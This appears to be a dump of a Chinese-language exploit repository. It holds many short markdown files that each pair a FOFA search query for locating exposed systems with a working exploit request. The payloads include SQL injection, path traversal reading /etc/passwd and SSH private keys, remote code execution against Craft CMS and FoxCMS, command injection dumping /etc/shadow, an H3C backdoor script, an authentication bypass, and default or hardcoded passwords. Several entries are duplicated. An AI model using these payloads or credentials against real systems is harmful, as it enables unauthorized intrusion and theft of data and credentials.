│ ├── 飞鱼星智能上网行为管理系统存在敏感信息泄露漏洞.md
│ └── 飞鱼星智能上网行为管理系统存在权限绕过漏洞.md
├── 驰骋BPM
├── 驰骋BPMRunSQL_Init存在SQL注入漏洞.md
└── 驰骋BPM系统存在SQL注入漏洞.md
├── 魅思
└── 魅思视频管理系统getOrderStatus存在SQL注入漏洞.md
├── 魅思视频管理系统
└── 魅思视频管理系统getOrderStatus存在SQL注入漏洞.md
├── 魔方网表
├── 魔方网表mailupdate.jsp接口存在任意文件上传漏洞.md
└── 魔方网表mailupdate接口存在任意文件上传漏洞.md
├── 鸿宇科技
└── 鸿宇多用户商城scan_list.php存在SQL注入漏洞.md
├── 黄药师
├── 药业管理软件UploadFile文件上传漏洞.md
└── 药业管理软件XSDService.asmx存在SQL注入漏洞.md
├── 龙腾码支付
└── 龙腾码支付payservicecurl任意文件读取.md
└── 龙采科技集团有限责任公司
├── 龙采商城系统后台_goods_getcate存在SQL注入.md
├── 龙采商城系统存在未授权修改文章title.md
├── 龙采商城系统存在未授权添加会员登录.md
└── 龙采商城系统新人礼包权限开关处存在未授权SQL注入.md
/wpoc/Apache/Apache-HertzBeat开源实时监控系统存在默认口令漏洞.md:
--------------------------------------------------------------------------------
1 | # Apache-HertzBeat开源实时监控系统存在默认口令漏洞
2 | HertzBeat(赫兹跳动) 是一个开源实时监控系统,无需Agent,性能集群,兼容Prometheus,自定义监控和状态页构建能力。HertzBeat 的强大自定义,多类型支持,高性能,易扩展,希望能帮助用户快速构建自有监控系统。HertzBeat(赫兹跳动) 开源实时监控系统存在默认口令漏洞。
3 |
4 | ## fofa
5 |
6 | ```javascript
7 | app="HertzBeat-实时监控系统"
8 | ```
9 |
10 | 
11 |
12 | ## poc
13 | ```java
14 | 默认账号密码 admin/hertzbeat
15 | ```
16 |
17 | 
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/Appium Desktop/Appium Desktop CVE-2023-2479漏洞.md:
--------------------------------------------------------------------------------
1 | ## Appium Desktop CVE-2023-2479漏洞
2 |
3 | appium-desktop 是 Appium 服务器的图形界面,也是一个应用程序检查器
4 |
5 | 由于用户输入审查不当,此软件包的受影响版本容易受到命令注入的攻击,允许攻击者设置反向 shell。
6 |
7 |
8 | ## poc
9 | ```
10 | http://127.0.0.1/?xss=
11 |
12 | http://127.0.0.1/?url=
13 |
14 | ```
15 |
--------------------------------------------------------------------------------
/wpoc/Appium-Desktop/Appium-Desktop-CVE-2023-2479漏洞.md:
--------------------------------------------------------------------------------
1 | ## Appium Desktop CVE-2023-2479漏洞
2 |
3 | appium-desktop 是 Appium 服务器的图形界面,也是一个应用程序检查器
4 |
5 | 由于用户输入审查不当,此软件包的受影响版本容易受到命令注入的攻击,允许攻击者设置反向 shell。
6 |
7 |
8 | ## poc
9 | ```
10 | http://127.0.0.1/?xss=
11 |
12 | http://127.0.0.1/?url=
13 |
14 | ```
15 |
--------------------------------------------------------------------------------
/wpoc/AspCMS/AspCMS系统commentList.asp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # AspCMS系统commentList.asp存在SQL注入漏洞
2 |
3 | AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码,进行解密后登录获取敏感数据。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="ASPCMS"
9 | ```
10 |
11 | ## poc
12 |
13 | ```asp
14 | /plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
15 | ```
16 |
17 | 
--------------------------------------------------------------------------------
/wpoc/Bazarr/Bazarr任意文件读取(CVE-2024-40348).md:
--------------------------------------------------------------------------------
1 | # Bazarr任意文件读取(CVE-2024-40348)
2 |
3 | Bazaar v1.4.3 的组件 /api/swaggerui/static 中存在一个问题,允许未经身份验证的攻击者执行目录遍历。
4 |
5 | ## poc
6 |
7 | ```yaml
8 | /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd
9 | ```
10 |
11 |
12 |
13 | ## 漏洞来源
14 |
15 | - https://www.seebug.org/vuldb/ssvid-99863
16 | - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
--------------------------------------------------------------------------------
/wpoc/CRMEB/CRMEB开源电商系统orderlist存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## CRMEB开源电商系统orderlist存在SQL注入漏洞
2 |
3 | CRMEB开源电商系统存在未授权sql注入漏洞
4 |
5 | ## fofa
6 |
7 | ```
8 | body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | P0ST /api/admin/system/store/order/list?keywords=1' HTTP/1.1
15 | Host:
16 | Content-Type:application/x-www-form-urlencoded
17 | ```
18 |
--------------------------------------------------------------------------------
/wpoc/Canal/Canal存在弱口令漏洞.md:
--------------------------------------------------------------------------------
1 | # Canal存在弱口令漏洞
2 |
3 | ### 一、漏洞描述
4 | Canal存在弱口令漏洞
5 |
6 | ### 二、影响版本
7 | 
8 |
9 | ### 三、漏洞复现
10 | ```plain
11 | admin/123456
12 | ```
13 |
14 | 
15 |
16 |
17 |
18 | > 更新: 2024-09-05 23:24:41
19 | > 原文:
--------------------------------------------------------------------------------
/wpoc/Chrome/CVE-2023-4357-Chrome-XXE漏洞.md:
--------------------------------------------------------------------------------
1 |
2 | ## CVE-2023-4357-Chrome-XXE漏洞
3 | CVE-2023-4357-Chrome-XXE
4 | Chrome XXE 漏洞 POC
5 | 实现对访客者本地文件读取
6 |
7 | ## 影响版本
8 | ```
9 | Chrome 版本 < 116.0.5845.96
10 | Chromium 版本 < 116.0.5845.96
11 | Electron 版本 < 26.1.0
12 | ```
13 |
14 | ## poc
15 | ```
16 | https://github.com/xcanwin/CVE-2023-4357-Chrome-XXE
17 | ```
18 |
--------------------------------------------------------------------------------
/wpoc/ClusterControl/ClusterControl存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # ClusterControl存在任意文件读取漏洞
2 |
3 |
4 |
5 | ## poc
6 |
7 | ```yaml
8 | GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
9 | Host:
10 | Accept-Encoding: identity
11 | User-Agent: python-urllib3/1.26.4
12 | ```
13 |
14 | 
15 |
16 | 
--------------------------------------------------------------------------------
/wpoc/Coremail邮件系统/Coremail邮件系统未授权访问获取管理员账密.md:
--------------------------------------------------------------------------------
1 | ## Coremail邮件系统未授权访问获取管理员账密
2 | ```
3 | /coremail/common/assets/;/;/;/;/;/;/s?__biz=MzI3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626e68&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2
4 | ```
5 |
--------------------------------------------------------------------------------
/wpoc/Craft/Craft CMS远程代码执行漏洞CVE-2023-41892.md:
--------------------------------------------------------------------------------
1 | ## Craft CMS远程代码执行漏洞CVE-2023-41892
2 |
3 | ## 影响版本
4 | Craft CMS >= 4.0.0-RC1
5 | Craft CMS <= 4.4.14
6 |
7 | ## exp
8 | ```
9 | POST /index.php HTTP/1.1
10 | Host: {{Hostname}}
11 | Content-Type: application/x-www-form-urlencoded
12 |
13 | action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
14 | ```
15 |
--------------------------------------------------------------------------------
/wpoc/Craft/Craft-CMS远程代码执行漏洞CVE-2023-41892.md:
--------------------------------------------------------------------------------
1 | ## Craft CMS远程代码执行漏洞CVE-2023-41892
2 |
3 | ## 影响版本
4 | Craft CMS >= 4.0.0-RC1
5 | Craft CMS <= 4.4.14
6 |
7 | ## exp
8 | ```
9 | POST /index.php HTTP/1.1
10 | Host: {{Hostname}}
11 | Content-Type: application/x-www-form-urlencoded
12 |
13 | action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
14 | ```
15 |
--------------------------------------------------------------------------------
/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md:
--------------------------------------------------------------------------------
1 |
2 | ## CrushFTP身份验证绕过(CVE-2025-2825)
3 |
4 | ## poc
5 | ```javascript
6 | GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
7 | Host: target-server:8081
8 | Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
9 | Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
10 |
11 | ```
12 |
13 | 
14 |
--------------------------------------------------------------------------------
/wpoc/D-Link/D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ## D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞
2 |
3 | CVE-2024-33113 是 D-LINK DIR-845L 路由器中的一个漏洞,允许通过 bsc_sms_inbox.php 文件泄露信息。该漏洞是由于对 include() 函数处理不当而引起的,可以通过操纵 $file 变量来利用该漏洞。这使得攻击者可以包含任意 PHP 脚本并可能检索敏感信息,例如路由器的用户名和密码。
4 |
5 | ## poc
6 |
7 | ```
8 | http://IP:8080/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1
9 | ```
10 |
11 | 
--------------------------------------------------------------------------------
/wpoc/D-Link/D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md:
--------------------------------------------------------------------------------
1 | ## D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853)
2 |
3 | D-LINK的Go-RT-AC750 RTAC750_A1_FW_v101b03固件在AlphaNetworks账户中使用了硬编码密码,远程攻击者可以通过telnet会话获得root权限。
4 |
5 | ## poc
6 |
7 | ```
8 | Alphanetworks:wrgac18_dlob.hans_ac750
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/wpoc/D-Link/D-LINK-Go-RT-AC750-GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md:
--------------------------------------------------------------------------------
1 | ## D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853)
2 |
3 | D-LINK的Go-RT-AC750 RTAC750_A1_FW_v101b03固件在AlphaNetworks账户中使用了硬编码密码,远程攻击者可以通过telnet会话获得root权限。
4 |
5 | ## poc
6 |
7 | ```
8 | Alphanetworks:wrgac18_dlob.hans_ac750
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/wpoc/DCN/DCN有线无线智能一体化控制器WEB管理系统.md:
--------------------------------------------------------------------------------
1 | ## DCN有线无线智能一体化控制器WEB管理系统
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```
8 | app="DCN-DCWS-6028"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /goform/UserPassOperation?user=admin333&password=123456&userpriority=15&operation=1 HTTP/1.1
15 | Host: your-ip
16 | Content-Length: 2
17 | ```
18 |
19 |
20 |
21 | 
--------------------------------------------------------------------------------
/wpoc/DCN/神州数码DCN系统接口online_list.php存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 神州数码DCN系统接口online_list.php存在任意文件读取漏洞
2 |
3 | 神州数码DCN系统接口online_list.php存在任意文件读取漏洞
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="style/blue/css/dcn_ui.css"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | POST /function/auth/user/online_list.php HTTP/1.1
15 | Host: {{Hostname}}
16 | Content-Type: application/x-www-form-urlencoded
17 |
18 | proxy_request=/etc/passwd
19 | ```
20 |
21 | 
--------------------------------------------------------------------------------
/wpoc/DT/DT高清车牌识别摄像机存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## DT高清车牌识别摄像机存在任意文件读取漏洞
2 |
3 | DT高清车牌识别摄像机是一种高科技产品,主要用于抓拍和识别车牌信息,用于交通管理、违章抓拍、电子收费等目的。DT-高清车牌识别摄像机存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件。
4 |
5 | ## fofa
6 |
7 | ```
8 | app="DT-高清车牌识别摄像机"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /../../../../etc/passwd HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Accept-Encoding: gzip, deflate
18 | Accept: */*
19 | Connection: keep-alive
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/DataEase/DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269).md:
--------------------------------------------------------------------------------
1 | # DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269)
2 |
3 | DataEase是一个开源数据可视化和分析工具,在版本2.5.0之前存在数据库配置信息暴露漏洞。通过浏览器访问`/de2api/engine/getEngine;.js`路径可以获取平台的数据库配置。该漏洞已在v2.5.0中修复,除了升级之外,没有已知的解决方法。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="Dataease"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | /de2api/engine/getEngine;.js
15 | ```
16 |
17 | 
18 |
19 | ## 漏洞来源
20 |
21 | - https://github.com/dataease/dataease/security/advisories/GHSA-8gvx-4qvj-6vv5
--------------------------------------------------------------------------------
/wpoc/DockerUI/DockerUI存在弱口令漏洞.md:
--------------------------------------------------------------------------------
1 | # DockerUI存在弱口令漏洞
2 | DockerUI是一款开源的、强大的、轻量级的Docker管理工具。DockerUI覆盖了 docker cli 命令行 95% 以上的命令功能,通过可视化的界面,即使是不熟悉docker命令的用户也可以非常方便的进行Docker和Docker Swarm集群进行管理和维护。
3 |
4 | ## fofa
5 | ```javascript
6 | "static/common/js/ui.js"
7 | ```
8 |
9 | 
10 |
11 | ## poc
12 | ```java
13 | ginghan/123456
14 | ```
15 |
16 | 
17 |
18 |
--------------------------------------------------------------------------------
/wpoc/EDU/中新天达系统存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 中新天达系统存在任意文件读取漏洞
2 |
3 | 中新天达系统`/aexp/ProxyDownload`存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。
4 |
5 | ## fofa
6 |
7 | ```haskell
8 | body="aexp/ValidateImage"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | /aexp/ProxyDownload?path=/speedec/webapps/webftp/../../../../etc/passwd
15 | ```
16 |
17 | 
--------------------------------------------------------------------------------
/wpoc/ELADMIN/ELADMIN后台管理系统存在SSRF漏洞.md:
--------------------------------------------------------------------------------
1 | # ELADMIN后台管理系统存在SSRF漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | "ELADMIN"
9 | ```
10 |
11 | ## poc
12 |
13 | 
14 |
15 |
16 |
17 | 
--------------------------------------------------------------------------------
/wpoc/EasyCVR视频管理平台/EasyCVR 视频管理平台存在用户信息泄露.md:
--------------------------------------------------------------------------------
1 | ## EasyCVR 视频管理平台存在用户信息泄露
2 | EasyCVR 智能视频监控综合管理平台是一种针对大中型用户在跨区域网络化视频监控集中管理领域的安防管理软件。它具备多项功能,包括信息资源管理、设备管理、用户管理、网络管理和安全管理。该平台能够实现监控中心对所有视频监控图像的集中管理,并支持多个品牌设备的联网,确保联网视频监控传输质量,并提供资源统一检索和数据共享的功能。
3 |
4 | ## fofa
5 | ```
6 | title="EasyCVR"
7 | ```
8 |
9 | ## poc
10 | ```
11 | /api/v1/userlist?pageindex=0&pagesize=10
12 |
13 | ```
14 | 
15 |
--------------------------------------------------------------------------------
/wpoc/EasyCVR视频管理平台/EasyCVR-视频管理平台存在用户信息泄露.md:
--------------------------------------------------------------------------------
1 | ## EasyCVR 视频管理平台存在用户信息泄露
2 | EasyCVR 智能视频监控综合管理平台是一种针对大中型用户在跨区域网络化视频监控集中管理领域的安防管理软件。它具备多项功能,包括信息资源管理、设备管理、用户管理、网络管理和安全管理。该平台能够实现监控中心对所有视频监控图像的集中管理,并支持多个品牌设备的联网,确保联网视频监控传输质量,并提供资源统一检索和数据共享的功能。
3 |
4 | ## fofa
5 | ```
6 | title="EasyCVR"
7 | ```
8 |
9 | ## poc
10 | ```
11 | /api/v1/userlist?pageindex=0&pagesize=10
12 |
13 | ```
14 | 
15 |
--------------------------------------------------------------------------------
/wpoc/Elgg/elgg-sqli.md:
--------------------------------------------------------------------------------
1 | ## Elgg 5.1.4 Sql Injection
2 |
3 | ## fofa
4 | ```
5 | icon_hash="413602919"
6 | ```
7 | ## poc
8 | ```
9 | GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
10 | Host:
11 | ```
12 |
13 | ## Ref
14 | - https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md
--------------------------------------------------------------------------------
/wpoc/Emlog/emlog后台插件任意文件上传(CVE-2024-33752).md:
--------------------------------------------------------------------------------
1 | ## emlog后台插件任意文件上传(CVE-2024-33752)
2 |
3 | emlog 是一款基于 PHP 和 MySQL 的功能强大的博客及 CMS 建站系统,追求快速、稳定、简单、舒适的建站体验。
4 |
5 |
6 |
7 | ## fofa
8 |
9 | ```
10 | app="EMLOG"
11 | ```
12 |
13 |
14 |
15 | ## poc
16 |
17 | 1.制作插件zip(zip内必须有一个文件夹)。
18 |
19 | 
20 |
21 | 2.点击“插件-安装插件-选择文件”上传制作好的zip文件
22 |
23 | 
24 |
25 | 3.然后访问下面链接,成功getshell。
26 |
27 | ```
28 | http://192.168.243.175/content/plugins/test/test.php
29 | ```
--------------------------------------------------------------------------------
/wpoc/FOXCMS黔狐内容管理系统/FOXCMS黔狐内容管理系统_远程代码执行漏洞(CVE-2025-29306).md:
--------------------------------------------------------------------------------
1 | # FOXCMS黔狐内容管理系统_远程代码执行漏洞(CVE-2025-29306)
2 |
3 | # 漏洞简介
4 | FoxCMS黔狐内容管理系统存在远程代码执行漏洞(CVE-2025-29306)。该漏洞存在于FoxCMS的index.html接口中,允许攻击者通过特定的输入执行远程代码,从而控制受影响的系统。
5 |
6 | # fofa
7 | body="foxcms-logo" || body="foxcms-container"
8 |
9 | # poc
10 | ```
11 | http://host/images/index.html?id=%24{%40print(system(%22id%22))
12 | ```
13 |
--------------------------------------------------------------------------------
/wpoc/GNU Mailman/GNU Mailman目录遍历漏洞(CVE-2025-43919).md:
--------------------------------------------------------------------------------
1 | # GNU Mailman目录遍历漏洞(CVE-2025-43919)
2 |
3 | # 漏洞描述
4 | GNU Mailman 2.1.39 与 cPanel 和 WHM 捆绑在一起,在终端中存在一个严重的目录遍历漏洞。由于 CGI 脚本的输入验证不足,/mailman/private/mailman未经身份验证的攻击者可以利用此漏洞读取服务器上的任意文件,例如Mailman 配置文件。此漏洞存在严重的信息泄露风险,并且与其他漏洞利用程序结合使用时,可能会引发进一步的攻击。
5 |
6 | # poc
7 | ```
8 | curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman
9 | ```
10 |
11 | 漏洞原文:https://github.com/0NYX-MY7H/CVE-2025-43919
12 |
--------------------------------------------------------------------------------
/wpoc/Git/Git远程代码执行漏洞(CVE-2024-32002).md:
--------------------------------------------------------------------------------
1 | ## Git远程代码执行漏洞(CVE-2024-32002)
2 |
3 |
4 |
5 | ## 影响版本:
6 |
7 | ```
8 | v2.45.0 v2.44.0 <=v2.43.3 <=v2.42.1 v2.41.0 <=v2.40.1 <=v2.39.3
9 | ```
10 |
11 | ## 修复版本:
12 |
13 | ```
14 | v2.45.1 v2.44.1 v2.43.4 v2.42.2 v2.41.1 v2.40.2 v2.39.4
15 | ```
16 |
17 |
18 |
19 | ## poc
20 |
21 | - https://github.com/10cks/captain
22 |
23 |
24 |
25 | ## 漏洞分析
26 |
27 | - https://forum.butian.net/share/3040
--------------------------------------------------------------------------------
/wpoc/H3C/H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598).md:
--------------------------------------------------------------------------------
1 | ## H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598)
2 |
3 | H3C Magic R100 存在安全漏洞,该漏洞源于updserver服务打开了疑似官方后门的9034端口,允许攻击者执行任意命令。
4 |
5 | ## exp
6 | ```
7 | import socket
8 |
9 | Ip="0.0.0.0"
10 | Port=9034
11 |
12 | msg=b"cat & ls &"
13 | server_address=(Ip,Port)
14 |
15 | udp_socket=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
16 | udp_socket.sendto(msg,server_address)
17 |
18 | udp_socket.close()
19 | ```
20 |
21 | ## 漏洞来源
22 | - https://the-itach1.github.io/2022/09/05/CVE-2022-34598%20H3C%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
23 |
--------------------------------------------------------------------------------
/wpoc/H3C/H3C网络管理系统任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 |
2 | ## H3C网络管理系统任意文件读取漏洞
3 |
4 | ## fofa
5 | ```
6 | body="webui/js/jquerylib/jquery-1.7.2.min.js"
7 | ```
8 |
9 | ## poc
10 | ```
11 | GET /webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1
12 |
13 | ```
14 | 
15 |
16 | 
17 |
--------------------------------------------------------------------------------
/wpoc/Hytec/Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞
2 |
3 | ## fofa
4 | ```
5 | title="index" && header="lighttpd/1.4.30"
6 | ```
7 |
8 | ### poc
9 | ```
10 |
11 | /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137921
12 | ```
13 |
--------------------------------------------------------------------------------
/wpoc/Hytec/Hytec-Inter-HWL-2511-SS-popen.cgi命令注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞
2 |
3 | ## fofa
4 | ```
5 | title="index" && header="lighttpd/1.4.30"
6 | ```
7 |
8 | ### poc
9 | ```
10 |
11 | /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137921
12 | ```
13 |
--------------------------------------------------------------------------------
/wpoc/JEPaaS低代码平台/JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞
2 |
3 | JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息。
4 |
5 | ## fofa
6 |
7 | ```
8 | body="/saas/saasYhAction!sendRandom.action"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | POST /j_spring_security_check HTTP/1.1
15 | Host: your-ip
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Content-Type: application/x-www-form-urlencoded
18 |
19 | j_username=');DECLARE @x CHAR(9);SET @x=0x303a303a35;WAITFOR DELAY @x--
20 | ```
--------------------------------------------------------------------------------
/wpoc/JFinalCMS/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md:
--------------------------------------------------------------------------------
1 | ## JFinalCMS 任意文件读取漏洞(CVE-2023-41599)
2 |
3 |
4 | ## 特征
5 | ```
6 | fofa:
7 | body="content=\"JreCms"
8 |
9 | hunter:
10 | web.body="content=\"JreCms"
11 | ```
12 | ## POC
13 | ```
14 | Windows: /../../../../../../../../../test.txt
15 | Linux: /../../../../../../../../../etc/passwd
16 |
17 | /common/down/file?filekey=/../../../../../../../../../etc/passwd
18 | ```
19 |
20 |
21 | ## 漏洞分析
22 | http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/
23 |
--------------------------------------------------------------------------------
/wpoc/JFinalCMS/JFinalCMS-任意文件读取漏洞(CVE-2023-41599).md:
--------------------------------------------------------------------------------
1 | ## JFinalCMS 任意文件读取漏洞(CVE-2023-41599)
2 |
3 |
4 | ## 特征
5 | ```
6 | fofa:
7 | body="content=\"JreCms"
8 |
9 | hunter:
10 | web.body="content=\"JreCms"
11 | ```
12 | ## POC
13 | ```
14 | Windows: /../../../../../../../../../test.txt
15 | Linux: /../../../../../../../../../etc/passwd
16 |
17 | /common/down/file?filekey=/../../../../../../../../../etc/passwd
18 | ```
19 |
20 |
21 | ## 漏洞分析
22 | http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/
23 |
--------------------------------------------------------------------------------
/wpoc/JeecgBoot/JeecgBoot反射型XSS漏洞.md:
--------------------------------------------------------------------------------
1 | # JeecgBoot反射型XSS漏洞
2 |
3 |
4 |
5 | ```
6 | GET /userController.do?%3CsCrIpT%3Ealert(document.domain)%3C/sCrIpT%3E HTTP/1.1
7 | Host: {{Hostname}}
8 | User-Agent: Mozilla/5.0 (Macintosh; Intel MacOS X 10.15; rv:126.0) Gecko/20100101Firefox/126.0
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/wpoc/JumpServer/JumpServer未授权漏洞.md:
--------------------------------------------------------------------------------
1 | ## CVE-2023-42442
2 |
3 | ## 影响版本
4 | 3.0.0 <= JumpServer <= 3.5.4
5 |
6 | 3.6.0 <= JumpServer <= 3.6.3
7 |
8 | ## fofa
9 | ```
10 | icon_hash="-1162630024"
11 | ```
12 |
13 | ## Hunter
14 | ```
15 | app.name="JumpServer"
16 | ```
17 | ## POC
18 |
19 | JumpServer 是一款开源的堡垒机。 在JumpServer受影响版本中,由于/api/v1/terminal/sessions/接口没有添加权限认证,未授权的攻击者可以通过访问/api/v1/terminal/sessions/?limit=1,获取堡垒机terminal的session信息
20 | ```
21 | /api/v1/terminal/sessions/?limit=1
22 | ```
23 |
--------------------------------------------------------------------------------
/wpoc/Kuboard/Kuboard默认口令.md:
--------------------------------------------------------------------------------
1 | ## Kuboard默认口令
2 | 漏洞描述:
3 | Kuboard,是一款免费的 Kubernetes 图形化管理工具,Kuboard 力图帮助用户快速在 Kubernetes 上落地微服务。Kuboard存在默认口令可以通过默认口令登录Kuboard,管理Kubernetes。
4 | admin/kuboard123
5 |
--------------------------------------------------------------------------------
/wpoc/LVS精益价值管理系统/LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```
8 | body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
9 | ```
10 |
11 |
12 |
13 | ## poc
14 |
15 | ```
16 | GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
17 | Host:
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
19 | Content-Type: application/x-www-form-urlencoded
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | Connection: keep-alive
23 | ```
24 |
25 |
--------------------------------------------------------------------------------
/wpoc/LiveGBS/LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md:
--------------------------------------------------------------------------------
1 | ## LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138)
2 |
3 | ## fofa
4 | ```
5 | icon_hash="-206100324"
6 | ```
7 |
8 |
9 | ## poc
10 | ```
11 | GET /api/v1/user/save?ID=&Username=root&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1
12 | Host:
13 | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
14 | Connection: close
15 |
16 | ```
17 |
18 | 
19 |
--------------------------------------------------------------------------------
/wpoc/MailCow/MailCow存在Swagger未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | # MailCow存在Swagger未授权访问漏洞
2 |
3 | # 一、漏洞描述
4 | MailCow存在Swagger未授权访问漏洞
5 |
6 | # 二、影响版本
7 | ```plain
8 | body="mailcow UI"
9 | ```
10 |
11 | 
12 |
13 | # 三、漏洞复现
14 | ```plain
15 | /api/
16 | ```
17 |
18 | 
19 |
20 |
21 |
22 | > 更新: 2024-10-22 09:41:43
23 | > 原文:
--------------------------------------------------------------------------------
/wpoc/MasterSAM/MasterSAM接口downloadService任意文件读取.md:
--------------------------------------------------------------------------------
1 | # MasterSAM接口downloadService任意文件读取
2 |
3 | **MasterSAM Star Gate的/adamaladamalduwnoadService接口存在任意文件下载漏洞,未经身份验证的攻击者可以通过该漏洞下载服务器任意文件,从而获取大量敏感信息。**
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="MasterSAM"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /adama/adama/downloadService?type=1&file=../../../../etc/passwd HTTP/1.1
15 | Host: your-ip
16 | ```
17 |
18 | 
19 |
20 |
21 |
22 | ## 漏洞来源
23 |
